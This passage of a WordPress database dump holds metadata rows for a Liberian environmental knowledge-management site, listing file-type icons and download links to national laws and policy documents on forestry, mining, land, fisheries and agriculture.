}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(9658,1687,'_wp_attached_file','2019/11/jpg.png'),(9659,1687,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:15:\"2019/11/jpg.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"jpg-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"jpg-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(9660,1688,'_wp_attached_file','2019/11/png.png'),(9661,1688,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:15:\"2019/11/png.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"png-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"png-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(9662,1689,'_wp_attached_file','2019/11/ppt.png'),(9663,1689,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:15:\"2019/11/ppt.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"ppt-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"ppt-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(9664,1690,'_wp_attached_file','2019/11/xls.png'),(9665,1690,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:15:\"2019/11/xls.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"xls-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"xls-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(9666,1691,'_wp_attached_file','2019/11/zip.png'),(9667,1691,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:15:\"2019/11/zip.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"zip-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"zip-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(9668,1692,'_wp_attached_file','2019/11/mp4.png'),(9669,1692,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:15:\"2019/11/mp4.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"mp4-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"mp4-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(9670,1693,'_wp_attached_file','2019/11/avi.png'),(9671,1693,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:15:\"2019/11/avi.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"avi-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"avi-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(9672,1694,'_wp_attached_file','2019/11/doc.png'),(9673,1694,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:15:\"2019/11/doc.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"doc-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"doc-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(9674,570,'_pods_file_type_image','a:1:{i:0;i:1686;}'),(9679,1695,'_elementor_controls_usage','a:0:{}'),(9680,1695,'by','J.S. Datuama Cammue'),(9681,1695,'year','2019'),(9683,1695,'download_link','https://ekmsliberia.info/wp-content/uploads/2019/11/6th-National-CBD-Report.pdf'),(9684,1695,'_pods_cover_image','a:1:{i:0;i:573;}'),(9685,1695,'_pods_file_type_image','a:1:{i:0;i:1686;}'),(9688,1695,'_dp_original','570'),(9689,1695,'_edit_lock','1670322871:42'),(9690,1695,'_edit_last','42'),(9691,1696,'_wp_attached_file','2019/11/6th-National-CBD-Report.pdf'),(9693,1695,'_pods_attached_document','a:1:{i:0;i:1696;}'),(9695,1697,'_elementor_controls_usage','a:0:{}'),(9696,1697,'by','Ministry of Foreign Affairs'),(9697,1697,'year','1976'),(9698,1697,'download_link','https://ekmsliberia.info/wp-content/uploads/2019/11/FDA-1976.pdf'),(9699,1697,'_pods_cover_image','a:1:{i:0;i:573;}'),(9700,1697,'_pods_file_type_image','a:1:{i:0;i:1686;}'),(9705,1697,'_dp_original','1695'),(9706,1697,'_edit_lock','1670322880:42'),(9707,1697,'_edit_last','42'),(9708,1698,'_wp_attached_file','2019/11/FDA-1976.pdf'),(9710,1697,'_pods_attached_document','a:1:{i:0;i:1698;}'),(9712,1699,'_elementor_controls_usage','a:0:{}'),(9713,1699,'by','Various'),(9714,1699,'year','Various'),(9715,1699,'download_link','https://ekmsliberia.info/wp-content/uploads/2019/11/Forestry-Laws-Summaries.docx'),(9716,1699,'_pods_cover_image','a:1:{i:0;i:573;}'),(9722,1699,'_dp_original','1697'),(9723,1699,'_edit_lock','1670322899:42'),(9724,1699,'_edit_last','42'),(9725,1700,'_wp_attached_file','2019/11/Forestry-Laws-Summaries.docx'),(9726,1699,'_pods_file_type_image','a:1:{i:0;i:1694;}'),(9728,1699,'_pods_attached_document','a:1:{i:0;i:1700;}'),(9730,1701,'_elementor_controls_usage','a:0:{}'),(9731,1701,'by','Ministry Mines and Energy'),(9732,1701,'year','2010'),(9733,1701,'download_link','https://ekmsliberia.info/wp-content/uploads/2019/11/Liberia-Mineral-Policy.pdf'),(9734,1701,'_pods_cover_image','a:1:{i:0;i:573;}'),(9740,1701,'_dp_original','1699'),(9741,1701,'_edit_lock','1670322911:42'),(9742,1701,'_edit_last','42'),(9743,1702,'_wp_attached_file','2019/11/Liberia-Forest-Policy.pdf'),(9744,1701,'_pods_file_type_image','a:1:{i:0;i:1686;}'),(9748,1703,'_elementor_controls_usage','a:0:{}'),(9749,1703,'by','Forestry Development Authority'),(9750,1703,'year','2006'),(9751,1703,'download_link','https://ekmsliberia.info/wp-content/uploads/2019/11/Liberia-Forest-Policy-1.pdf'),(9752,1703,'_pods_cover_image','a:1:{i:0;i:573;}'),(9754,1703,'_pods_file_type_image','a:1:{i:0;i:1686;}'),(9758,1703,'_dp_original','1701'),(9759,1703,'_edit_lock','1670322943:42'),(9760,1703,'_edit_last','42'),(9761,1704,'_wp_attached_file','2019/11/Liberia-Forest-Policy-1.pdf'),(9763,1703,'_pods_attached_document','a:1:{i:0;i:1704;}'),(9765,1705,'_elementor_controls_usage','a:0:{}'),(9766,1705,'by','Ministry of Foreign Affairs'),(9767,1705,'year','2000'),(9768,1705,'download_link','https://ekmsliberia.info/wp-content/uploads/2019/11/Liberia-Mining-Law-2000.pdf-1.pdf'),(9769,1705,'_pods_cover_image','a:1:{i:0;i:573;}'),(9770,1705,'_pods_file_type_image','a:1:{i:0;i:1686;}'),(9775,1705,'_dp_original','1703'),(9776,1705,'_edit_lock','1670322980:42'),(9777,1705,'_edit_last','42'),(9778,1706,'_wp_attached_file','2019/11/Liberia-Mining-Law-2000.pdf-1.pdf'),(9780,1705,'_pods_attached_document','a:1:{i:0;i:1706;}'),(9782,1707,'_elementor_controls_usage','a:0:{}'),(9783,1707,'by','Ministry of Foreign Affairs'),(9784,1707,'year','2006'),(9785,1707,'download_link','https://ekmsliberia.info/wp-content/uploads/2019/11/Liberia_forestry_reform_law.pdf'),(9786,1707,'_pods_cover_image','a:1:{i:0;i:573;}'),(9787,1707,'_pods_file_type_image','a:1:{i:0;i:1686;}'),(9792,1707,'_dp_original','1705'),(9793,1707,'_edit_lock','1670322992:42'),(9794,1707,'_edit_last','42'),(9795,1708,'_wp_attached_file','2019/11/Liberia_forestry_reform_law.pdf'),(9797,1707,'_pods_attached_document','a:1:{i:0;i:1708;}'),(9799,1709,'_elementor_controls_usage','a:0:{}'),(9800,1709,'by','The World Bank'),(9801,1709,'year','2018'),(9802,1709,'download_link','https://ekmsliberia.info/wp-content/uploads/2019/11/Liberia-Country-Forest-Note.pdf'),(9803,1709,'_pods_cover_image','a:1:{i:0;i:573;}'),(9809,1709,'_dp_original','1707'),(9810,1709,'_edit_lock','1670323120:42'),(9811,1709,'_edit_last','42'),(9812,1710,'_wp_attached_file','2019/11/Liberia-Country-Forest-Note.pdf'),(9814,1709,'_pods_attached_document','a:1:{i:0;i:1710;}'),(9816,1711,'_elementor_controls_usage','a:0:{}'),(9817,1711,'by','MME'),(9818,1711,'year','2007'),(9819,1711,'download_link','https://ekmsliberia.info/wp-content/uploads/2019/11/National-Integrated-Water-Resources-Management-Policy.pdf'),(9820,1711,'_pods_cover_image','a:1:{i:0;i:573;}'),(9821,1711,'_pods_file_type_image','a:1:{i:0;i:1686;}'),(9826,1711,'_dp_original','1709'),(9827,1711,'_edit_lock','1670323103:42'),(9828,1711,'_edit_last','42'),(9829,1712,'_wp_attached_file','2019/11/National-Integrated-Water-Resources-Management-Policy.pdf'),(9831,1711,'_pods_attached_document','a:1:{i:0;i:1712;}'),(9833,1713,'_elementor_controls_usage','a:0:{}'),(9834,1713,'by','FDA'),(9835,1713,'year','Various'),(9836,1713,'download_link','https://ekmsliberia.info/wp-content/uploads/2019/11/Regulations_FDA.zip'),(9837,1713,'_pods_cover_image','a:1:{i:0;i:573;}'),(9843,1713,'_dp_original','1711'),(9844,1713,'_edit_lock','1670323087:42'),(9845,1713,'_edit_last','42'),(9846,1714,'_wp_attached_file','2019/11/Regulations_FDA.zip'),(9847,1713,'_pods_file_type_image','a:1:{i:0;i:1691;}'),(9849,1713,'_pods_attached_document','a:1:{i:0;i:1714;}'),(9851,1715,'_elementor_controls_usage','a:0:{}'),(9852,1715,'by','MOA'),(9853,1715,'year','1973'),(9854,1715,'download_link','https://ekmsliberia.info/wp-content/uploads/2019/11/1973-–-agriculture-law-ext-fr.pdf'),(9855,1715,'_pods_cover_image','a:1:{i:0;i:573;}'),(9861,1715,'_dp_original','1713'),(9862,1715,'_edit_lock','1670323219:42'),(9863,1715,'_edit_last','42'),(9864,1716,'_wp_attached_file','2019/11/1973-–-agriculture-law-ext-fr.pdf'),(9865,1715,'_pods_file_type_image','a:1:{i:0;i:1686;}'),(9867,1715,'_pods_attached_document','a:1:{i:0;i:1716;}'),(9871,1718,'_elementor_controls_usage','a:0:{}'),(9872,1718,'by','EPA'),(9873,1718,'year','2006'),(9874,1718,'download_link','https://ekmsliberia.info/wp-content/uploads/2019/11/2006-01-01-guidelines-–-2006-–-environmental-impact-assessment-procedural-guideline-liberia-abstract-ext-en.pdf'),(9875,1718,'_pods_cover_image','a:1:{i:0;i:573;}'),(9877,1718,'_pods_file_type_image','a:1:{i:0;i:1686;}'),(9881,1718,'_dp_original','1715'),(9882,1718,'_edit_lock','1670323175:42'),(9883,1719,'_wp_attached_file','2019/11/2006-01-01-guidelines-–-2006-–-environmental-impact-assessment-procedural-guideline-liberia-abstract-ext-en.pdf'),(9884,1718,'_edit_last','42'),(9886,1718,'_pods_attached_document','a:1:{i:0;i:1719;}'),(9888,1720,'_elementor_controls_usage','a:0:{}'),(9889,1720,'by','FDA'),(9890,1720,'year','2009'),(9891,1720,'download_link','https://ekmsliberia.info/wp-content/uploads/2019/11/2009-01-01-regulation-–-2009-regulation-on-environmental-impact-assessment-–-liberia-ext-en.pdf'),(9892,1720,'_pods_cover_image','a:1:{i:0;i:573;}'),(9893,1720,'_pods_file_type_image','a:1:{i:0;i:1686;}'),(9898,1720,'_dp_original','1718'),(9899,1720,'_edit_lock','1670323169:42'),(9900,1720,'_edit_last','42'),(9901,1721,'_wp_attached_file','2019/11/2009-01-01-regulation-–-2009-regulation-on-environmental-impact-assessment-–-liberia-ext-en.pdf'),(9903,1720,'_pods_attached_document','a:1:{i:0;i:1721;}'),(9905,1722,'_elementor_controls_usage','a:0:{}'),(9906,1722,'by','EPA'),(9907,1722,'year','2002'),(9908,1722,'download_link','https://ekmsliberia.info/wp-content/uploads/2019/11/ENVIRONMENT-PROTECTION-AND-MANAGEMENT-LAW-LIBERIA.pdf'),(9909,1722,'_pods_cover_image','a:1:{i:0;i:573;}'),(9910,1722,'_pods_file_type_image','a:1:{i:0;i:1686;}'),(9915,1722,'_dp_original','1720'),(9916,1722,'_edit_lock','1670323315:42'),(9917,1722,'_edit_last','42'),(9918,1723,'_wp_attached_file','2019/11/ENVIRONMENT-PROTECTION-AND-MANAGEMENT-LAW-LIBERIA.pdf'),(9920,1722,'_pods_attached_document','a:1:{i:0;i:1723;}'),(9922,1724,'_elementor_controls_usage','a:0:{}'),(9923,1724,'by','MOA'),(9924,1724,'year','2014'),(9925,1724,'download_link','https://ekmsliberia.info/wp-content/uploads/2019/11/fisheries_policy_doc.pdf'),(9926,1724,'_pods_cover_image','a:1:{i:0;i:573;}'),(9927,1724,'_pods_file_type_image','a:1:{i:0;i:1686;}'),(9932,1724,'_dp_original','1722'),(9933,1724,'_edit_lock','1670323450:42'),(9934,1724,'_edit_last','42'),(9935,1725,'_wp_attached_file','2019/11/fisheries_policy_doc.pdf'),(9937,1724,'_pods_attached_document','a:1:{i:0;i:1725;}'),(9939,1726,'_elementor_controls_usage','a:0:{}'),(9940,1726,'by','MOA'),(9941,1726,'year','2010'),(9942,1726,'download_link','https://ekmsliberia.info/wp-content/uploads/2019/11/Fisheries_Regulation_2010.pdf'),(9943,1726,'_pods_cover_image','a:1:{i:0;i:573;}'),(9944,1726,'_pods_file_type_image','a:1:{i:0;i:1686;}'),(9949,1726,'_dp_original','1724'),(9950,1726,'_edit_lock','1670323309:42'),(9951,1726,'_edit_last','42'),(9952,1727,'_wp_attached_file','2019/11/Fisheries_Regulation_2010.pdf'),(9954,1726,'_pods_attached_document','a:1:{i:0;i:1727;}'),(9958,1728,'_elementor_controls_usage','a:0:{}'),(9959,1728,'by','Ministry of Foreign Affairs'),(9960,1728,'year','2016'),(9961,1728,'download_link','https://ekmsliberia.info/wp-content/uploads/2019/11/Land_Authority_Act_2016.pdf'),(9962,1728,'_pods_cover_image','a:1:{i:0;i:573;}'),(9963,1728,'_pods_file_type_image','a:1:{i:0;i:1686;}'),(9968,1728,'_dp_original','1724'),(9969,1728,'_edit_lock','1670323899:42'),(9970,1728,'_edit_last','42'),(9971,1729,'_wp_attached_file','2019/11/Land_Authority_Act_2016.pdf'),(9973,1728,'_pods_attached_document','a:1:{i:0;i:1729;}'),(9975,1730,'_elementor_controls_usage','a:0:{}'),(9976,1730,'by','Land Commission, RL'),(9977,1730,'year','2013'),(9978,1730,'download_link','https://ekmsliberia.info/wp-content/uploads/2019/11/Land_Rights_Policy-1.pdf'),(9979,1730,'_pods_cover_image','a:1:{i:0;i:573;}'),(9980,1730,'_pods_file_type_image','a:1:{i:0;i:1686;}'),(9985,1730,'_dp_original','1728'),(9986,1730,'_edit_lock','1670323892:42'),(9987,1730,'_edit_last','42'),(9988,1731,'_wp_attached_file','2019/11/Land_Rights_Policy-1.pdf'),(9990,1730,'_pods_attached_document','a:1:{i:0;i:1731;}'),(9992,1732,'_elementor_controls_usage','a:0:{}'),(9993,1732,'by','Staff of the African Development Bank Group'),(9994,1732,'year','2013'),(9995,1732,'download_link','https://ekmsliberia.info/wp-content/uploads/2019/11/Liberia_-_Infrastructure_and_Inclusive_Growth_-_Full_Report.pdf'),(9996,1732,'_pods_cover_image','a:1:{i:0;i:573;}'),(9997,1732,'_pods_file_type_image','a:1:{i:0;i:1686;}'),(10002,1732,'_dp_original','1730'),(10003,1732,'_edit_lock','1670324035:42'),(10004,1732,'_edit_last','42'),(10005,1733,'_wp_attached_file','2019/11/Liberia_-_Infrastructure_and_Inclusive_Growth_-_Full_Report.pdf'),(10007,1732,'_pods_attached_document','a:1:{i:0;i:1733;}'),(10009,1734,'_elementor_controls_usage','a:0:{}'),(10010,1734,'by','Land Commission, RL'),(10011,1734,'year','2010'),(10012,1734,'download_link','https://ekmsliberia.info/wp-content/uploads/2019/11/2010_County_Consultation_on_Land.pdf'),(10013,1734,'_pods_cover_image','a:1:{i:0;i:573;}'),(10014,1734,'_pods_file_type_image','a:1:{i:0;i:1686;}'),(10019,1734,'_dp_original','1732'),(10020,1734,'_edit_lock','1670323824:42'),(10021,1734,'_edit_last','42'),(10022,1735,'_wp_attached_file','2019/11/National-Transport-Policy.pdf'),(10023,1736,'_wp_attached_file','2019/11/2010_County_Consultation_on_Land.pdf'),(10025,1734,'_pods_attached_document','a:1:{i:0;i:1736;}'),(10027,1737,'_elementor_controls_usage','a:0:{}'),(10028,1737,'by','MOA'),(10029,1737,'year','2016'),(10030,1737,'download_link','https://ekmsliberia.info/wp-content/uploads/2019/11/2016-Liberia-Draft-Fertilizer-Regulation-I.pdf'),(10031,1737,'_pods_cover_image','a:1:{i:0;i:573;}'),(10032,1737,'_pods_file_type_image','a:1:{i:0;i:1686;}'),(10037,1737,'_dp_original','1734'),(10038,1737,'_edit_lock','1670323969:42'),(10039,1737,'_edit_last','42'),(10040,1738,'_wp_attached_file','2019/11/2016-Liberia-Draft-Fertilizer-Regulation-I.pdf'),(10042,1737,'_pods_attached_document','a:1:{i:0;i:1738;}'),(10044,1739,'_elementor_controls_usage','a:0:{}'),(10045,1739,'by','MOA'),(10046,1739,'year','2016'),(10047,1739,'download_link','https://ekmsliberia.info/wp-content/uploads/2019/11/2016-Liberia-Plant-Protection-Regulatory-Services-Bureau.pdf'),(10048,1739,'_pods_cover_image','a:1:{i:0;i:573;}'),(10049,1739,'_pods_file_type_image','a:1:{i:0;i:1686;}'),(10054,1739,'_dp_original','1737'),(10055,1739,'_edit_lock','1670323968:42'),(10056,1739,'_edit_last','42'),(10057,1740,'_wp_attached_file','2019/11/2016-Liberia-Plant-Protection-Regulatory-Services-Bureau.pdf'),(10059,1739,'_pods_attached_document','a:1:{i:0;i:1740;}'),(10063,1741,'_elementor_controls_usage','a:0:{}'),(10064,1741,'by','MOA'),(10065,1741,'year','2016'),(10066,1741,'download_link','https://ekmsliberia.info/wp-content/uploads/2019/11/2016-Liberia-Seed-Regulation-I.pdf'),(10067,1741,'_pods_cover_image','a:1:{i:0;i:573;}'),(10068,1741,'_pods_file_type_image','a:1:{i:0;i:1686;}'),(10073,1741,'_dp_original','1737'),(10074,1741,'_edit_lock','1670323967:42'),(10075,1741,'_edit_last','42'),(10076,1742,'_wp_attached_file','2019/11/2016-Liberia-Seed-Regulation-I.pdf'),(10078,1741,'_pods_attached_document','a:1:{i:0;i:1742;}'),(10080,1743,'_elementor_controls_usage','a:0:{}'),(10081,1743,'by','MOA'),(10082,1743,'year','N/A'),(10083,1743,'download_link','https://ekmsliberia.info/wp-content/uploads/2019/11/Agricultural-Sector.pdf'),(10084,1743,'_pods_cover_image','a:1:{i:0;i:573;}'),(10085,1743,'_pods_file_type_image','a:1:{i:0;i:1686;}'),(10090,1743,'_dp_original','1741'),(10091,1743,'_edit_lock','1670323706:42'),(10092,1743,'_edit_last','42'),(10093,1744,'_wp_attached_file','2019/11/Agricultural-Sector.pdf'),(10095,1743,'_pods_attached_document','a:1:{i:0;i:1744;}'),(10097,1745,'_elementor_controls_usage','a:0:{}'),(10098,1745,'by','James Tefft, Economic and Social Department Group (RAFE), FAO Regional Office for Africa'),(10099,1745,'year','2005'),(10100,1745,'download_link','https://ekmsliberia.info/wp-content/uploads/2019/11/Agriculture-Policy.pdf'),(10101,1745,'_pods_cover_image','a:1:{i:0;i:573;}'),(10102,1745,'_pods_file_type_image','a:1:{i:0;i:1686;}'),(10107,1745,'_dp_original','1743'),(10108,1745,'_edit_lock','1670323703:42'),(10109,1745,'_edit_last','42'),(10110,1746,'_wp_attached_file','2019/11/Agriculture-Policy.pdf'),(10112,1745,'_pods_attached_document','a:1:{i:0;i:1746;}'),(10114,1747,'_elementor_controls_usage','a:0:{}'),(10115,1747,'by','EPA'),(10116,1747,'year','N/A'),(10117,1747,'download_link','https://ekmsliberia.info/wp-content/uploads/2019/11/Analysis-of-Liberia-Environmental-Policy-Framework-2.pdf'),(10118,1747,'_pods_cover_image','a:1:{i:0;i:573;}'),(10119,1747,'_pods_file_type_image','a:1:{i:0;i:1686;}'),(10124,1747,'_dp_original','1745'),(10125,1747,'_edit_lock','1670323628:42'),(10126,1747,'_edit_last','42'),(10127,1748,'_wp_attached_file','2019/11/Analysis-of-Liberia-Environmental-Policy-Framework.pdf'),(10131,1749,'_elementor_controls_usage','a:0:{}'),(10132,1749,'by','ASM-PACE'),(10133,1749,'year','N/A'),(10134,1749,'download_link','https://ekmsliberia.info/wp-content/uploads/2019/11/ASM-brochure.pdf'),(10135,1749,'_pods_cover_image','a:1:{i:0;i:573;}'),(10136,1749,'_pods_file_type_image','a:1:{i:0;i:1686;}'),(10141,1749,'_dp_original','1745'),(10142,1749,'_edit_lock','1670323700:42'),(10145,1749,'_edit_last','42'),(10146,1750,'_wp_attached_file','2019/11/ASM-brochure.pdf'),(10148,1749,'_pods_attached_document','a:1:{i:0;i:1750;}'),(10150,1751,'_elementor_controls_usage','a:0:{}'),(10151,1751,'by','UNEP, EPA'),(10152,1751,'year','2007'),(10153,1751,'download_link','https://ekmsliberia.info/wp-content/uploads/2019/11/assessment-of-solid-waste-in-Liberia.pdf'),(10154,1751,'_pods_cover_image','a:1:{i:0;i:573;}'),(10155,1751,'_pods_file_type_image','a:1:{i:0;i:1686;}'),(10160,1751,'_dp_original','1749'),(10161,1751,'_edit_lock','1670323697:42'),(10162,1751,'_edit_last','42'),(10163,1752,'_wp_attached_file','2019/11/assessment-of-solid-waste-in-Liberia.pdf'),(10165,1751,'_pods_attached_document','a:1:{i:0;i:1752;}'),(10167,1753,'_wp_page_template','elementor_canvas'),(10168,1753,'_elementor_edit_mode','builder'),(10169,1753,'_elementor_data','[{\"id\":\"6d6akgq\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"60\",\"isLinked\":false},\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1774e6d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0inpzhi\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":17.387,\"_inline_size_tablet\":33.33},\"elements\":[{\"id\":\"4jd1kd4\",\"elType\":\"widget\",\"settings\":{\"position_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"oew-logo\"}],\"isInner\":false},{\"id\":\"y54k1uv\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":61.749,\"_inline_size_tablet\":33.33,\"css_classes\":\"hide-tablet-mobile\"},\"elements\":[{\"id\":\"d076988\",\"elType\":\"widget\",\"settings\":{\"title\":\"Environmental Knowledge Management 